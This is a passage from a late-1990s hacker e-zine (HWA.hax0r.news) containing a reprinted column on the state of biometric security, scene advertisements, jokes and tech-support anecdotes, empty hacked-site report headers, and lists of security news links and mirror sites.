The rapidly evolving science of biometrics uses unique physical attributes -- voice, fingerprint, iris -- to identify users. Biometric security products exist now. But it will be another year at least before we start realizing their full potential. Here's a look at where the biometric roadmap will take us:

WHERE WE ARE

Biometrics have been around for decades. The public sector -- particularly military and law enforcement -- were the early adopters.
Today public agencies use biometrics for such things as preventing welfare fraud and determining eligibility for health care benefits. But usage outside of government remains spotty, particularly in the enterprise, for several reasons:

Steep prices. Costs range from less than $100 for a basic reading device to thousands for a fully integrated access system. But Gartner Group research director Jackie Fenn says costs are dropping dramatically. That will be key to widespread adoption.

Lack of standards. Integrating biometric systems with mainstream PC technology is a headache IT execs don't need. But there's movement toward standards among consortiums such as BioAPI. (See link below.)

Early failures. Vendors admit fingerprint sensor tools introduced last year weren't as robust as they needed to be -- a black mark on a fledgling industry.

WHERE WE'RE GOING

Government will continue to be a hot market for biometric security, but experts see huge potential in the financial community and the medical industry. The security issues that haunt corporate IT and ecommerce make them obvious markets for biometrics too. (For some fascinating biometric applications, see today's Special Report.)

Here's how the Gartner Group predicts the biometric emergence will happen:

- 2000: Full-scale rollout of iris recognition for bank tellers and ATMs
- 2001: Fingerprint recognition becomes the remote access tool of choice for corporations that adopt biometrics
- 2002: Iris recognition gains lead over fingerprints for installations serving many users

What's your take on biometrics? Does the technology look like a long-term answer to our security woes? Use TalkBack to tell me what you think. Or jump to my Berst Alert forum and hash it out with other readers.

Too bad it's such a slow road to mainstream biometrics. Because some days I really do think AnchorDesk has been possessed.
No sooner had Jon offered to buy everyone lunch than our GenX associate editor Nicci Noteboom asked if I wanted her to stay late and help me with a project.

@HWA

AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    *****************************************************************************
    *                                                                           *
    *   ATTRITION.ORG            http://www.attrition.org                       *
    *   ATTRITION.ORG            Advisory Archive, Hacked Page Mirror           *
    *   ATTRITION.ORG            DoS Database, Crypto Archive                   *
    *   ATTRITION.ORG            Sarcasm, Rudeness, and More.                   *
    *                                                                           *
    *****************************************************************************
    Come.to/Canc0n99
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    http://come.to/Canc0n99

    SYSTEM NEWS: Canc0n99 is looking for more speakers and industry people to
    attend with booths and talks. You could have a booth and presentation for
    the cost of little more than a doorprize (tba). Contact us at our main
    address for info, hwa@press.usmc.net, and also join the mailing list for
    updates. This is the first Canadian event of its type and will have both
    white and black hat attendees. Come out and shake hands with the other
    side... *g* Mainly have some fun and maybe do some networking (both kinds).
    See ya there!

    http://come.to/Canc0n99
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

    $$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$
    !   *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ***          !
    $$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$

    www.2600.com  www.freekevin.com  www.kevinmitnick.com
    Support 2600.com and the Free Kevin defense fund site, visit it now! FREE KEVIN!
    One of our sponsors, visit them now: www.csoft.net

    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
    WWW.BIZTECHTV.COM/PARSE   WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV
    JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD
    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
    WWW.2600.COM   OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM
    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

    //////////////////////////////////////////////////////////////////////////////
    // To place an ad in this section simply type it up and email it to         //
    // hwa@press.usmc.net, put AD! in the subject header please. - Ed           //
    //////////////////////////////////////////////////////////////////////////////

@HWA

HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Don't worry. worry a *lot*

The Top Ten Signs Your Co-worker Is a Computer Hacker.

10: You ticked him off once and your next phone bill was for $20,000.
 9: He's won the Publisher's Clearing House sweepstakes 3 years running.
 8: When asked for his phone number, he gives it in hex.
 7: Seems strangely calm whenever the office LAN goes down.
 6: Somehow gets HBO on his PC at work.
 5: Mumbled, "Oh, puh-leeez" 95 times during the movie "The Net".
 4: Massive 401k contribution made in half-cent increments.
 3: His video dating profile lists "public-key encryption" among turn-ons.
 2: When his computer starts up, you hear, "Good Morning, Mr. President".
 1: You hear him murmur, "Let's see you use that Visa now, Professor I-Don't-Give-A's-In-Computer-Science!"

Most infamous things people do on their computer
http://www.vmnet.net/infamous.html

These are some of the better 'computer moments' we have found on the net. If you would like to add something just fill out the form below.

Our company used to sell time on our computers so very small companies that couldn't afford computers at the time could do their bookkeeping, etc. One day, a new woman came in. She fumbled about for about 10 minutes but I paid no attention to her. Finally she came out and grumbled something about how the computer wouldn't turn on. I grilled her with the usual obvious questions: Did you turn the switch on? Did you plug it in? Did you turn on the switch on the power strip? She was sure she had done everything right. I was sure she neglected to plug one of the power cords into the power strip. So, I went to investigate and she was *RIGHT*, she *HAD* plugged everything in to the power strip... including the power strip's own power cord - talk about a ground loop!

A woman called the shop where she had bought a PC and complained that it didn't work properly: Every time she switched it on the screen was filled with characters. Two technicians were sent out and were met by a woman with tits about twice the size of Dolly Parton's and glasses about two centimeters thick. They asked her to switch on the computer. This she did, and then leaned over the keyboard to read what was on the screen... The problem was quickly solved.

A tech support guy once told me that he got a call from someone saying that the computer screen just went black and the computer wouldn't respond at all. The tech guy (starting with the obvious) asked the guy if the computer was still plugged in, that maybe his foot had knocked the plug out of the socket.
The guy on the other end of the phone said to hold on, that he would be back in a minute with a flashlight because the electricity had just gone out in his building and he couldn't see under the desk without the lights....

I was trying to teach this sales person (for automated entrance systems [they made gates]) how to enter his letters into Word Perfect. I told him to select Word Perfect from his menu and when he did it gave him the opening screen which said, "Press any key to continue..." He looked at the keyboard for awhile then asked me, "Where is the 'any' key?".

There is the classic one (which I hope is an urban myth) of the secretary working in an accounting firm who is told to make back up copies of the discs every night. Every night she carefully collected together all the discs and took them away to copy them. After six months the hard disc crashed but no-one was worried because they had backups, until the secretary brought in the huge pile of paper with a nice photocopied disc on each!

A user called the PC Support line of the university having trouble with her Mac. It was handed off to one of the Mac guys...
"What seems to be the problem?"
"It's not working."
Eyes roll. "What's not working?"
"My Mac."
- Five minutes of drawing the problem out of the woman deleted -
"Okay, to access the files on the disk click the mouse on the picture of the disk."
Pause. Nothing happened.
"I told you, I've already tried this."
Support guy makes as if he is strangling the phone. "Okay, do it again. Is the mouse moving?"
"Yep."
"On the screen?"
"Yep."
"Now click twice on the picture of the disk."
Pause and the consultant hears the two clicks again.
"Nothing."
"Ma'am, double-click once more for me."
Clink-clink.
"Ma'am, are you hitting the screen with your mouse.......?"

While I was working in a placement office at the University, we helped students write their resumes on the computer. A student came up to me and said he had problems reading the disk.
I asked him to show it to me so I could see if I could recover the files. "Sure." he said, and took the disk (5 1/4" floppy) out of his pocket and unfolded it.

Another time, while working at a computer store, somebody who bought his computer from us was having trouble with one of his disks. The man was living in another city, so I asked him to send me a copy of the disk, and I would take a look at it. A few days later, an envelope arrived for me; it contained a "photocopy" of the front and back side of the disk.

@HWA

SITE.1

@HWA

H.W Hacked websites
~~~~~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)

Haven't heard from Catharsys in a while; for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'...

From HNN rumours section, http://www.hackernews.com/ , another busy weekend for some folks...

May 17th
contributed by Anonymous
Cracked

May 18th
From HNN rumours section, http://www.hackernews.com/
contributed by Anonymous
Cracked
The following sites have been reported to HNN as being cracked.
May 19th
From HNN's rumours section http://www.hackernews.com/
contributed by Anonymous
Cracked
The following have been reported as Cracked

May 20th
From HNN's rumours section http://www.hackernews.com/
contributed by Anonymous
Cracked
The following sites have been reported to HNN as cracked

May 21st
contributed by Anonymous
Cracked
The following have been reported to HNN as Cracked

-------------------------------------------------------------------------

A.0 APPENDICES
_________________________________________________________________________

A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this
file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.genocide2600.com/~tattooman/zines/hwahaxornews/
http://archives.projectgamma.com/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

International links: (TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondents and others please send in news site links that have security news from foreign countries for inclusion in this list, thanks... - Ed

Belgium.......: http://bewoner.dma.be/cum/
Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Colombia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.

Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it.
@HWA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-